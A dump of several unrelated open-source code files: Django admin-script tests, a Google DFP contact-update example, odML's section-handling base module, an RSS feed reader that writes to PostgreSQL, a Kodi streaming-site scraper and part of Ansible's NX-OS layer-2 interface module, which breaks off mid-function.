"NoArg Commands raise an error if an argument is provided"
args = ['noargs_command','argument']
out, err = self.run_manage(args)
self.assertOutput(err, "Error: Command doesn't accept any arguments")
def test_app_command(self):
"User AppCommands can execute when a single app name is provided"
args = ['app_command', 'auth']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:AppCommand app=<module 'django.contrib.auth.models'")
self.assertOutput(out, os.sep.join(['django','contrib','auth','models.py']))
self.assertOutput(out, "'>, options=[('pythonpath', None), ('settings', None), ('traceback', None)]")
def test_app_command_no_apps(self):
"User AppCommands raise an error when no app name is provided"
args = ['app_command']
out, err = self.run_manage(args)
self.assertOutput(err, 'Error: Enter at least one appname.')
def test_app_command_multiple_apps(self):
"User AppCommands raise an error when multiple app names are provided"
args = ['app_command','auth','contenttypes']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:AppCommand app=<module 'django.contrib.auth.models'")
self.assertOutput(out, os.sep.join(['django','contrib','auth','models.pyc']) + "'>, options=[('pythonpath', None), ('settings', None), ('traceback', None)]")
self.assertOutput(out, "EXECUTE:AppCommand app=<module 'django.contrib.contenttypes.models'")
self.assertOutput(out, os.sep.join(['django','contrib','contenttypes','models.py']))
self.assertOutput(out, "'>, options=[('pythonpath', None), ('settings', None), ('traceback', None)]")
def test_app_command_invalid_appname(self):
"User AppCommands can execute when a single app name is provided"
args = ['app_command', 'NOT_AN_APP']
out, err = self.run_manage(args)
self.assertOutput(err, "App with label NOT_AN_APP could not be found")
def test_app_command_some_invalid_appnames(self):
"User AppCommands can execute when some of the provided app names are invalid"
args = ['app_command', 'auth', 'NOT_AN_APP']
out, err = self.run_manage(args)
self.assertOutput(err, "App with label NOT_AN_APP could not be found")
def test_label_command(self):
"User LabelCommands can execute when a label is provided"
args = ['label_command','testlabel']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:LabelCommand label=testlabel, options=[('pythonpath', None), ('settings', None), ('traceback', None)]")
def test_label_command_no_label(self):
"User LabelCommands raise an error if no label is provided"
args = ['label_command']
out, err = self.run_manage(args)
self.assertOutput(err, 'Enter at least one label')
def test_label_command_multiple_label(self):
"User LabelCommands are executed multiple times if multiple labels are provided"
args = ['label_command','testlabel','anotherlabel']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:LabelCommand label=testlabel, options=[('pythonpath', None), ('settings', None), ('traceback', None)]")
self.assertOutput(out, "EXECUTE:LabelCommand label=anotherlabel, options=[('pythonpath', None), ('settings', None), ('traceback', None)]")
class ArgumentOrder(AdminScriptTestCase):
"""Tests for 2-stage argument parsing scheme.
django-admin command arguments are parsed in 2 parts; the core arguments
(--settings, --traceback and --pythonpath) are parsed using a Lax parser.
This Lax parser ignores any unknown options. Then the full settings are
passed to the command parser, which extracts commands of interest to the
individual command.
"""
def setUp(self):
self.write_settings('settings.py', apps=['django.contrib.auth','django.contrib.contenttypes'])
self.write_settings('alternate_settings.py')
def tearDown(self):
self.remove_settings('settings.py')
self.remove_settings('alternate_settings.py')
def test_setting_then_option(self):
"Options passed after settings are correctly handled"
args = ['base_command','testlabel','--settings=alternate_settings','--option_a=x']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:BaseCommand labels=('testlabel',), options=[('option_a', 'x'), ('option_b', '2'), ('option_c', '3'), ('pythonpath', None), ('settings', 'alternate_settings'), ('traceback', None)]")
def test_setting_then_short_option(self):
"Short options passed after settings are correctly handled"
        args = ['base_command','testlabel','--settings=alternate_settings','-a','x']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:BaseCommand labels=('testlabel',), options=[('option_a', 'x'), ('option_b', '2'), ('option_c', '3'), ('pythonpath', None), ('settings', 'alternate_settings'), ('traceback', None)]")
def test_option_then_setting(self):
"Options passed before settings are correctly handled"
args = ['base_command','testlabel','--option_a=x','--settings=alternate_settings']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:BaseCommand labels=('testlabel',), options=[('option_a', 'x'), ('option_b', '2'), ('option_c', '3'), ('pythonpath', None), ('settings', 'alternate_settings'), ('traceback', None)]")
def test_short_option_then_setting(self):
"Short options passed before settings are correctly handled"
args = ['base_command','testlabel','-a','x','--settings=alternate_settings']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:BaseCommand labels=('testlabel',), options=[('option_a', 'x'), ('option_b', '2'), ('option_c', '3'), ('pythonpath', None), ('settings', 'alternate_settings'), ('traceback', None)]")
def test_option_then_setting_then_option(self):
"Options are correctly handled when they are passed before and after a setting"
args = ['base_command','testlabel','--option_a=x','--settings=alternate_settings','--option_b=y']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:BaseCommand labels=('testlabel',), options=[('option_a', 'x'), ('option_b', 'y'), ('option_c', '3'), ('pythonpath', None), ('settings', 'alternate_settings'), ('traceback', None)]")
| agpl-3.0 | 365,962,058,021,763,840 | 47.258772 | 221 | 0.655821 | false |
cctaylor/googleads-python-lib | examples/dfp/v201408/contact_service/update_contacts.py | 4 | 2527 | #!/usr/bin/python
#
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example updates contact addresses.
To determine which contacts exist, run get_all_contacts.py.
The LoadFromStorage method is pulling credentials and properties from a
"googleads.yaml" file. By default, it looks for this file in your home
directory. For more information, see the "Caching authentication information"
section of our README.
Tags: ContactService.updateContacts
ContactService.getContactsByStatement
"""
__author__ = ('Nicholas Chen',
'Joseph DiLallo')
# Import appropriate modules from the client library.
from googleads import dfp
# Set the ID of the contact to update.
CONTACT_ID = 'INSERT_CONTACT_ID_HERE'
def main(client, contact_id):
# Initialize appropriate service.
contact_service = client.GetService('ContactService', version='v201408')
# Create statement object to select the single contact by ID.
values = [{
'key': 'id',
'value': {
'xsi_type': 'NumberValue',
'value': contact_id
}
}]
query = 'WHERE id = :id'
statement = dfp.FilterStatement(query, values, 1)
# Get contacts by statement.
response = contact_service.getContactsByStatement(
statement.ToStatement())
if 'results' in response:
updated_contacts = []
for contact in response['results']:
contact['address'] = '123 New Street, New York, NY, 10011'
updated_contacts.append(contact)
# Update the contact on the server.
contacts = contact_service.updateContacts(updated_contacts)
# Display results.
for contact in contacts:
print (('Contact with ID \'%s\', name \'%s\', and address \'%s\' '
'was updated.')
% (contact['id'], contact['name'], contact['address']))
else:
print 'No contacts found to update.'
if __name__ == '__main__':
# Initialize client object.
dfp_client = dfp.DfpClient.LoadFromStorage()
main(dfp_client, CONTACT_ID)
| apache-2.0 | -2,064,936,080,641,870,000 | 30.987342 | 77 | 0.696082 | false |
carloscanova/python-odml | odml/base.py | 2 | 16824 | # -*- coding: utf-8 -*-
"""
collects common base functionality
"""
import doc
import posixpath
import terminology
import mapping
from tools.doc_inherit import *
class _baseobj(object):
pass
class baseobject(_baseobj):
_format = None
@property
def document(self):
"""returns the Document object in which this object is contained"""
if self.parent is None:
return None
return self.parent.document
def get_terminology_equivalent(self):
"""
returns the equivalent object in an terminology (should there be one
defined) or None
"""
return None
def __eq__(self, obj):
"""
do a deep comparison of this object and its odml properties
"""
# cannot compare totally different stuff
if not isinstance(obj, _baseobj):
return False
if not isinstance(self, obj.__class__):
return False
for key in self._format:
if getattr(self, key) != getattr(obj, key):
return False
return True
def __ne__(self, obj):
"""
use the __eq__ function to determine if both objects are equal
"""
return not self == obj
def clean(self):
"""
stub that doesn't do anything for this class
"""
pass
def clone(self, children=True):
"""
clone this object recursively (if children is True) allowing to copy it independently
to another document. If children is False, this acts as a template cloner, creating
a copy of the object without any children
"""
# TODO don't we need some recursion / deepcopy here?
import copy
obj = copy.copy(self)
return obj
def _reorder(self, childlist, new_index):
l = childlist
old_index = l.index(self)
# 2 cases: insert after old_index / insert before
if new_index > old_index:
new_index += 1
l.insert(new_index, self)
if new_index < old_index:
del l[old_index+1]
else:
del l[old_index]
return old_index
def reorder(self, new_index):
"""
move this object in its parent child-list to the position *new_index*
returns the old index at which the object was found
"""
raise NotImplementedError
class SafeList(list):
def index(self, obj):
"""
find obj in list
be sure to use "is" based comparison (instead of __eq__)
"""
for i, e in enumerate(self):
if e is obj:
return i
raise ValueError("remove: %s not in list" % repr(obj))
def remove(self, obj):
"""
remove an element from this list
be sure to use "is" based comparison (instead of __eq__)
"""
del self[self.index(obj)]
class SmartList(SafeList):
def __getitem__(self, key):
"""
provides element index also by searching for an element with a given name
"""
# try normal list index first (for integers)
if type(key) is int:
return super(SmartList, self).__getitem__(key)
# otherwise search the list
for obj in self:
if (hasattr(obj, "name") and obj.name == key) or key == obj:
return obj
# and fail eventually
raise KeyError(key)
def __contains__(self, key):
for obj in self:
if (hasattr(obj, "name") and obj.name == key) or key == obj:
return True
def append(self, obj):
if obj.name in self:
raise KeyError("Object with the same name already exists! " + str(obj))
else:
super(SmartList, self).append(obj)
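# Illustrative use of the list helpers above (the Named class is a stand-in,
# not part of odml):
#
#     >>> class Named(object):
#     ...     def __init__(self, name): self.name = name
#     >>> l = SmartList()
#     >>> l.append(Named("stimulus"))
#     >>> l["stimulus"].name            # lookup by name instead of index
#     'stimulus'
#     >>> "stimulus" in l
#     True
#     >>> l.append(Named("stimulus"))   # duplicate names raise KeyError
#     Traceback (most recent call last):
#         ...
#     KeyError: ...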
@allow_inherit_docstring
class sectionable(baseobject, mapping.mapped):
def __init__(self):
self._sections = SmartList()
self._repository = None
@property
def document(self):
"""
returns the parent-most node (if its a document instance) or None
"""
p = self
while p.parent:
p = p.parent
if isinstance(p, doc.Document):
return p
@property
def sections(self):
"""the list of sections contained in this section/document"""
return self._sections
@mapping.remapable_insert
def insert(self, position, section):
"""
adds the section to the section-list and makes this document the section’s parent
currently just appends the section and does not insert at the specified *position*
"""
self._sections.append(section)
section._parent = self
@mapping.remapable_append
def append(self, section):
"""adds the section to the section-list and makes this document the section’s parent"""
self._sections.append(section)
section._parent = self
@inherit_docstring
def reorder(self, new_index):
return self._reorder(self.parent.sections, new_index)
@mapping.remapable_remove
def remove(self, section):
"""removes the specified child-section"""
self._sections.remove(section)
section._parent = None
def __getitem__(self, key):
return self._sections[key]
def __len__(self):
return len(self._sections)
def __iter__(self):
return self._sections.__iter__()
def itersections(self, recursive=True, yield_self=False, filter_func=lambda x: True, max_depth=None):
"""
iterate each child section
>>> # example: return all subsections which name contains "foo"
>>> filter_func = lambda x: getattr(x, 'name').find("foo") > -1
>>> sec_or_doc.itersections(filter_func=filter_func)
:param recursive: iterate all child sections recursively (deprecated)
:type recursive: bool
:param yield_self: includes itself in the iteration
:type yield_self: bool
:param filter_func: accepts a function that will be applied to each iterable. Yields
iterable if function returns True
:type filter_func: function
"""
stack = []
# below: never yield self if self is a Document
if self == self.document and (max_depth > 0 or max_depth is None):
for sec in self.sections:
stack.append((sec, 1)) # (<section>, <level in a tree>)
elif not self == self.document:
stack.append((self, 0)) # (<section>, <level in a tree>)
while len(stack) > 0:
(sec, level) = stack.pop(0)
if filter_func(sec) and (yield_self if level == 0 else True):
yield sec
if max_depth is None or level < max_depth:
for sec in sec.sections:
stack.append((sec, level + 1))
def iterproperties(self, max_depth=None, filter_func=lambda x: True):
"""
iterate each related property (recursively)
>>> # example: return all children properties which name contains "foo"
>>> filter_func = lambda x: getattr(x, 'name').find("foo") > -1
>>> sec_or_doc.iterproperties(filter_func=filter_func)
:param max_depth: iterate all properties recursively if None, only to a certain
level otherwise
:type max_depth: bool
:param filter_func: accepts a function that will be applied to each iterable. Yields
iterable if function returns True
:type filter_func: function
"""
for sec in [s for s in self.itersections(max_depth=max_depth, yield_self=True)]:
if hasattr(sec, "properties"): # not to fail if odml.Document
for i in sec.properties:
if filter_func(i):
yield i
def itervalues(self, max_depth=None, filter_func=lambda x: True):
"""
iterate each related value (recursively)
>>> # example: return all children values which string converted version has "foo"
>>> filter_func = lambda x: str(getattr(x, 'data')).find("foo") > -1
>>> sec_or_doc.itervalues(filter_func=filter_func)
:param max_depth: iterate all properties recursively if None, only to a certain
level otherwise
:type max_depth: bool
:param filter_func: accepts a function that will be applied to each iterable. Yields
iterable if function returns True
:type filter_func: function
"""
for prop in [p for p in self.iterproperties(max_depth=max_depth)]:
for v in prop.values:
if filter_func(v):
yield v
def contains(self, obj):
"""
checks if a subsection of name&type of *obj* is a child of this section
if so return this child
"""
for i in self._sections:
if obj.name == i.name and obj.type == i.type:
return i
def _matches(self, obj, key=None, type=None, include_subtype=False):
"""
find out
* if the *key* matches obj.name (if key is not None)
* or if *type* matches obj.type (if type is not None)
* if type does not match exactly, test for subtype. (e.g.stimulus/white_noise)
comparisons are case-insensitive, however both key and type
MUST be lower-case.
"""
name_match = (key is None or (key is not None and hasattr(obj, "name") and obj.name == key))
exact_type_match = (type is None or (type is not None and hasattr(obj, "type") and obj.type.lower() == type))
if not include_subtype:
return name_match and exact_type_match
subtype_match = type is None or (type is not None and hasattr(obj, "type") and
type in obj.type.lower().split('/')[:-1])
return name_match and (exact_type_match or subtype_match)
def get_section_by_path(self, path):
"""
find a Section through a path like "../name1/name2"
:param path: path like "../name1/name2"
:type path: str
"""
return self._get_section_by_path(path)
def get_property_by_path(self, path):
"""
find a Property through a path like "../name1/name2:property_name"
:param path: path like "../name1/name2:property_name"
:type path: str
"""
laststep = path.split(":") # assuming section names do not contain :
found = self._get_section_by_path(laststep[0])
return self._match_iterable(found.properties, ":".join(laststep[1:]))
def _match_iterable(self, iterable, key):
"""
Searches for a key match within a given iterable.
Raises ValueError if not found.
"""
for obj in iterable:
if self._matches(obj, key):
return obj
raise ValueError("Object named '%s' does not exist" % key)
def _get_section_by_path(self, path):
"""
Returns a Section by a given path.
Raises ValueError if not found.
"""
if path.startswith("/"):
if len(path) == 1:
raise ValueError("Not a valid path")
doc = self.document
if doc is not None:
return doc._get_section_by_path(path[1:])
raise ValueError("A section with no Document cannot resolve absolute path")
pathlist = path.split("/")
if len(pathlist) > 1:
if pathlist[0] == "..":
found = self.parent
elif pathlist[0] == ".":
found = self
else:
found = self._match_iterable(self.sections, pathlist[0])
if found:
return found._get_section_by_path("/".join(pathlist[1:]))
raise ValueError("Section named '%s' does not exist" % pathlist[0])
else:
return self._match_iterable(self.sections, pathlist[0])
def find(self, key=None, type=None, findAll=False, include_subtype=False):
"""return the first subsection named *key* of type *type*"""
ret = []
if type:
type = type.lower()
for s in self._sections:
if self._matches(s, key, type, include_subtype=include_subtype):
if findAll:
ret.append(s)
else:
return s
if ret:
return ret
def find_related(self, key=None, type=None, children=True, siblings=True, parents=True, recursive=True, findAll=False):
"""
finds a related section named *key* and/or *type*
* by searching its children’s children if *children* is True
if *recursive* is true all leave nodes will be searched
* by searching its siblings if *siblings* is True
* by searching the parent element if *parents* is True
if *recursive* is True all parent nodes until the root are searched
* if *findAll* is True, returns a list of all matching objects
"""
ret = []
if type:
type = type.lower()
if children:
for section in self._sections:
if self._matches(section, key, type):
if findAll:
ret.append(section)
else:
return section
if recursive:
obj = section.find_related(key, type, children, siblings=False, parents=False, recursive=recursive, findAll=findAll)
if obj is not None:
if findAll:
ret += obj
else:
return obj
if siblings and self.parent is not None:
obj = self.parent.find(key, type, findAll)
if obj is not None:
if findAll:
ret += obj
else:
return obj
if parents:
obj = self
while obj.parent is not None:
obj = obj.parent
if self._matches(obj, key, type):
if findAll:
ret.append(obj)
else:
return obj
if not recursive: break
if ret:
return ret
return None
def get_path(self):
"""
returns the absolute path of this section
"""
node = self
path = []
while node.parent is not None:
path.insert(0, node.name)
node = node.parent
return "/" + "/".join(path)
@staticmethod
def _get_relative_path(a, b):
"""
returns a relative path for navigation from dir *a* to dir *b*
if the common parent of both is "/", return an absolute path
"""
a += "/"
b += "/"
parent = posixpath.dirname(posixpath.commonprefix([a,b]))
if parent == "/": return b[:-1]
a = posixpath.relpath(a, parent)
b = posixpath.relpath(b, parent)
if a == ".": return b
return posixpath.normpath("../" * (a.count("/")+1) + b)
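    # Worked examples for the helper above (section names are hypothetical):
    #   _get_relative_path('/dataset/trial1', '/dataset/trial2') -> '../trial2'
    #   _get_relative_path('/dataset', '/analysis')              -> '/analysis'
    #   (in the second case the common parent is "/", so an absolute path is returned)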
def get_relative_path(self, section):
"""
returns a relative (file)path to point to section (e.g. ../other_section)
if the common parent of both sections is the document (i.e. /), return an absolute path
"""
a = self.get_path()
b = section.get_path()
return self._get_relative_path(a,b)
def clean(self):
"""
Runs clean() on all immediate child-sections causing any resolved links
or includes to be unresolved.
This should be called for the document prior to saving.
"""
for i in self:
i.clean()
def clone(self, children=True):
"""
clone this object recursively allowing to copy it independently
to another document
"""
obj = super(sectionable, self).clone(children)
obj._parent = None
obj._sections = SmartList()
if children:
for s in self._sections:
obj.append(s.clone())
return obj
@property
def repository(self):
"""An url to a terminology."""
return self._repository
@repository.setter
def repository(self, url):
if not url: url = None
self._repository = url
if url:
terminology.deferred_load(url)
def get_repository(self):
"""
return the current applicable repository (may be inherited from a
parent) or None
"""
return self._repository
| bsd-3-clause | -5,420,977,738,541,653,000 | 32.041257 | 136 | 0.553574 | false |
mtracy/News-Aggregation | src/readRSS.py | 1 | 1837 | import psycopg2
import sys
import json
import sys
import feedparser
import time
import graphParser
username = sys.argv[1]
pword = sys.argv[2]
url = sys.argv[3]
publisher = sys.argv[4]
subject = sys.argv[5]
refresh = float(sys.argv[6])
def checkDB(title):
cur.execute("SELECT * FROM stories WHERE title = %s;", (title,))
results = cur.fetchall()
if len(results) > 0:
return 1
return 0
try:
conn=psycopg2.connect(database='news', user=username, host='localhost', password=pword)
except Exception as e:
print("I am unable to connect to the database.")
print(e)
cur = conn.cursor()
print("connection to DB established")
feed = feedparser.parse(url)
if(feed.bozo == 1):
print("the url does not contain a well formed RSS")
sys.exit(-1)
print(feed.feed.title)
while(1):
for post in feed.entries:
title = post.title
if checkDB(title) == 1:
#print("skipping " + title)
break
else:
#string = title + ", " + post.published + ", " + post.links[0].href + ", " + post.summary + ", " + post.media_content[0]['url']
#print(string)
print("insterting " + title)
try:
media = post.media_content[0]['url']
except Exception as e:
media = ""
summary = post.summary.split("<")[0]
if len(summary) > 0:
path = graphParser.getPath(summary)
else:
path = graphParser.getPath(title)
print(summary)
print(path)
print("--------")
cur.execute("INSERT INTO stories (title, source, subject, taxonomy, pubtime, link, summary, media) VALUES (%s, %s, %s, %s, %s, %s, %s, %s);", (title, publisher, subject, path, post.published, post.links[0].href, summary, media))
conn.commit()
time.sleep(refresh)
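# Example invocation (the feed URL and credentials below are placeholders):
#   python readRSS.py dbuser dbpass http://example.com/world.rss ExamplePub world 300
# This polls the feed every 300 seconds and inserts previously unseen stories
# into the "stories" table of the local "news" database.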
| mit | -6,796,271,105,562,539,000 | 26.833333 | 240 | 0.592814 | false |
JamesLinEngineer/RKMC | addons/plugin.video.phstreams/resources/lib/sources/ororo_mv_tv.py | 2 | 4547 | # -*- coding: utf-8 -*-
'''
Exodus Add-on
Copyright (C) 2016 Exodus
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urlparse,json,base64
from resources.lib.modules import cache
from resources.lib.modules import control
from resources.lib.modules import client
class source:
def __init__(self):
self.domains = ['ororo.tv']
self.base_link = 'https://ororo.tv'
self.moviesearch_link = '/api/v2/movies'
self.tvsearch_link = '/api/v2/shows'
self.movie_link = '/api/v2/movies/%s'
self.show_link = '/api/v2/shows/%s'
self.episode_link = '/api/v2/episodes/%s'
self.user = control.setting('ororo.user')
self.password = control.setting('ororo.pass')
self.headers = {
'Authorization': 'Basic %s' % base64.b64encode('%s:%s' % (self.user, self.password)),
'User-Agent': 'Exodus for Kodi'
}
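        # The Authorization value above is plain HTTP Basic auth; e.g. for a
        # hypothetical account "user"/"pass" it evaluates to
        #   'Basic ' + base64.b64encode('user:pass') == 'Basic dXNlcjpwYXNz'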
def movie(self, imdb, title, year):
try:
if (self.user == '' or self.password == ''): raise Exception()
url = cache.get(self.ororo_moviecache, 60, self.user)
url = [i[0] for i in url if imdb == i[1]][0]
url= self.movie_link % url
return url
except:
return
def tvshow(self, imdb, tvdb, tvshowtitle, year):
try:
if (self.user == '' or self.password == ''): raise Exception()
url = cache.get(self.ororo_tvcache, 120, self.user)
url = [i[0] for i in url if imdb == i[1]][0]
url= self.show_link % url
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if (self.user == '' or self.password == ''): raise Exception()
if url == None: return
url = urlparse.urljoin(self.base_link, url)
r = client.request(url, headers=self.headers)
r = json.loads(r)['episodes']
r = [(str(i['id']), str(i['season']), str(i['number']), str(i['airdate'])) for i in r]
url = [i for i in r if season == '%01d' % int(i[1]) and episode == '%01d' % int(i[2])]
url += [i for i in r if premiered == i[3]]
url= self.episode_link % url[0][0]
return url
except:
return
def ororo_moviecache(self, user):
try:
url = urlparse.urljoin(self.base_link, self.moviesearch_link)
r = client.request(url, headers=self.headers)
r = json.loads(r)['movies']
r = [(str(i['id']), str(i['imdb_id'])) for i in r]
r = [(i[0], 'tt' + re.sub('[^0-9]', '', i[1])) for i in r]
return r
except:
return
def ororo_tvcache(self, user):
try:
url = urlparse.urljoin(self.base_link, self.tvsearch_link)
r = client.request(url, headers=self.headers)
r = json.loads(r)['shows']
r = [(str(i['id']), str(i['imdb_id'])) for i in r]
r = [(i[0], 'tt' + re.sub('[^0-9]', '', i[1])) for i in r]
return r
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
if url == None: return sources
if (self.user == '' or self.password == ''): raise Exception()
url = urlparse.urljoin(self.base_link, url)
url = client.request(url, headers=self.headers)
url = json.loads(url)['url']
sources.append({'source': 'ororo', 'quality': 'HD', 'provider': 'Ororo', 'url': url, 'direct': True, 'debridonly': False})
return sources
except:
return sources
def resolve(self, url):
return url
| gpl-2.0 | 5,996,479,877,914,455,000 | 29.797203 | 134 | 0.531779 | false |
Endika/odoomrp-wip | product_packaging_through_attributes/models/product.py | 25 | 1192 | # -*- coding: utf-8 -*-
##############################################################################
# For copyright and license notices, see __openerp__.py file in root directory
##############################################################################
from openerp import models, fields, api
class ProductAttribute(models.Model):
_inherit = 'product.attribute'
is_package = fields.Boolean(string='Is package')
class ProductAttributeValue(models.Model):
_inherit = 'product.attribute.value'
is_package_attr = fields.Boolean(
string='Package attribute', related='attribute_id.is_package')
package_product = fields.Many2one(
comodel_name='product.product', string='Package Product',
context="{'default_sale_ok': False, 'default_purchase_ok': False}")
class ProductPackaging(models.Model):
_inherit = 'product.packaging'
product = fields.Many2one(
comodel_name='product.product', string='Package Product',
context="{'default_sale_ok': False, 'default_purchase_ok': False}")
@api.one
@api.onchange('product')
def onchange_product(self):
self.product_tmpl_id = self.product.product_tmpl_id
| agpl-3.0 | -6,261,274,071,126,351,000 | 33.057143 | 78 | 0.594799 | false |
amenonsen/ansible | lib/ansible/modules/network/nxos/_nxos_l2_interface.py | 3 | 19166 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2017, Ansible by Red Hat, inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['deprecated'],
'supported_by': 'network'}
DOCUMENTATION = """
---
module: nxos_l2_interface
extends_documentation_fragment: nxos
version_added: "2.5"
short_description: Manage Layer-2 interface on Cisco NXOS devices.
description:
- This module provides declarative management of Layer-2 interface on
Cisco NXOS devices.
deprecated:
removed_in: '2.13'
alternative: nxos_l2_interfaces
why: Updated modules released with more functionality
author:
- Trishna Guha (@trishnaguha)
notes:
- Tested against NXOSv 7.0(3)I5(1).
options:
name:
description:
- Full name of the interface excluding any logical
unit number, i.e. Ethernet1/1.
required: true
aliases: ['interface']
mode:
description:
- Mode in which interface needs to be configured.
choices: ['access','trunk']
access_vlan:
description:
- Configure given VLAN in access port.
If C(mode=access), used as the access VLAN ID.
native_vlan:
description:
- Native VLAN to be configured in trunk port.
If C(mode=trunk), used as the trunk native VLAN ID.
trunk_vlans:
description:
- List of VLANs to be configured in trunk port.
If C(mode=trunk), used as the VLAN range to ADD or REMOVE
from the trunk.
aliases: ['trunk_add_vlans']
trunk_allowed_vlans:
description:
- List of allowed VLANs in a given trunk port.
If C(mode=trunk), these are the only VLANs that will be
configured on the trunk, i.e. "2-10,15".
aggregate:
description:
- List of Layer-2 interface definitions.
state:
description:
- Manage the state of the Layer-2 Interface configuration.
default: present
choices: ['present','absent', 'unconfigured']
"""
EXAMPLES = """
- name: Ensure Eth1/5 is in its default l2 interface state
nxos_l2_interface:
name: Ethernet1/5
state: unconfigured
- name: Ensure Eth1/5 is configured for access vlan 20
nxos_l2_interface:
name: Ethernet1/5
mode: access
access_vlan: 20
- name: Ensure Eth1/5 only has vlans 5-10 as trunk vlans
nxos_l2_interface:
name: Ethernet1/5
mode: trunk
native_vlan: 10
trunk_vlans: 5-10
- name: Ensure eth1/5 is a trunk port and ensure 2-50 are being tagged (doesn't mean others aren't also being tagged)
nxos_l2_interface:
name: Ethernet1/5
mode: trunk
native_vlan: 10
trunk_vlans: 2-50
- name: Ensure these VLANs are not being tagged on the trunk
nxos_l2_interface:
name: Ethernet1/5
mode: trunk
trunk_vlans: 51-4094
state: absent
- name: Aggregate Configure interfaces for access_vlan with aggregate
nxos_l2_interface:
aggregate:
- { name: "Ethernet1/2", access_vlan: 6 }
- { name: "Ethernet1/7", access_vlan: 15 }
mode: access
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device
returned: always, except for the platforms that use Netconf transport to manage the device.
type: list
sample:
- interface eth1/5
- switchport access vlan 20
"""
import re
from copy import deepcopy
from ansible.module_utils.network.nxos.nxos import get_config, load_config, run_commands
from ansible.module_utils.network.nxos.nxos import nxos_argument_spec, get_interface_type
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.common.utils import remove_default_spec
def get_interface_mode(name, module):
"""Gets current mode of interface: layer2 or layer3
Args:
device (Device): This is the device object of an NX-API enabled device
using the Device class within device.py
interface (string): full name of interface, i.e. Ethernet1/1,
loopback10, port-channel20, vlan20
Returns:
str: 'layer2' or 'layer3'
"""
command = 'show interface {0} | json'.format(name)
intf_type = get_interface_type(name)
mode = 'unknown'
interface_table = {}
try:
body = run_commands(module, [command])[0]
interface_table = body['TABLE_interface']['ROW_interface']
except (KeyError, AttributeError, IndexError):
return mode
if interface_table:
# HACK FOR NOW
if intf_type in ['ethernet', 'portchannel']:
mode = str(interface_table.get('eth_mode', 'layer3'))
if mode in ['access', 'trunk']:
mode = 'layer2'
if mode == 'routed':
mode = 'layer3'
elif intf_type == 'loopback' or intf_type == 'svi':
mode = 'layer3'
return mode
def interface_is_portchannel(name, module):
"""Checks to see if an interface is part of portchannel bundle
Args:
interface (str): full name of interface, i.e. Ethernet1/1
Returns:
True/False based on if interface is a member of a portchannel bundle
"""
intf_type = get_interface_type(name)
if intf_type == 'ethernet':
command = 'show interface {0} | json'.format(name)
try:
body = run_commands(module, [command])[0]
interface_table = body['TABLE_interface']['ROW_interface']
except (KeyError, AttributeError, IndexError):
interface_table = None
if interface_table:
state = interface_table.get('eth_bundle')
if state:
return True
else:
return False
return False
def get_switchport(port, module):
"""Gets current config of L2 switchport
Args:
device (Device): This is the device object of an NX-API enabled device
using the Device class within device.py
port (str): full name of interface, i.e. Ethernet1/1
Returns:
dictionary with k/v pairs for L2 vlan config
"""
command = 'show interface {0} switchport | json'.format(port)
try:
body = run_commands(module, [command])[0]
sp_table = body['TABLE_interface']['ROW_interface']
except (KeyError, AttributeError, IndexError):
sp_table = None
if sp_table:
key_map = {
"interface": "name",
"oper_mode": "mode",
"switchport": "switchport",
"access_vlan": "access_vlan",
"access_vlan_name": "access_vlan_name",
"native_vlan": "native_vlan",
"native_vlan_name": "native_vlan_name",
"trunk_vlans": "trunk_vlans"
}
sp = apply_key_map(key_map, sp_table)
return sp
else:
return {}
def remove_switchport_config_commands(name, existing, proposed, module):
mode = proposed.get('mode')
commands = []
command = None
if mode == 'access':
av_check = existing.get('access_vlan') == proposed.get('access_vlan')
if av_check:
command = 'no switchport access vlan {0}'.format(existing.get('access_vlan'))
commands.append(command)
elif mode == 'trunk':
existing_vlans = existing.get('trunk_vlans_list')
proposed_vlans = proposed.get('trunk_vlans_list')
vlans_to_remove = set(proposed_vlans).intersection(existing_vlans)
if vlans_to_remove:
proposed_allowed_vlans = proposed.get('trunk_allowed_vlans')
remove_trunk_allowed_vlans = proposed.get('trunk_vlans', proposed_allowed_vlans)
command = 'switchport trunk allowed vlan remove {0}'.format(remove_trunk_allowed_vlans)
commands.append(command)
native_check = existing.get('native_vlan') == proposed.get('native_vlan')
if native_check and proposed.get('native_vlan'):
command = 'no switchport trunk native vlan {0}'.format(existing.get('native_vlan'))
commands.append(command)
if commands:
commands.insert(0, 'interface ' + name)
return commands
def get_switchport_config_commands(name, existing, proposed, module):
"""Gets commands required to config a given switchport interface
"""
proposed_mode = proposed.get('mode')
existing_mode = existing.get('mode')
commands = []
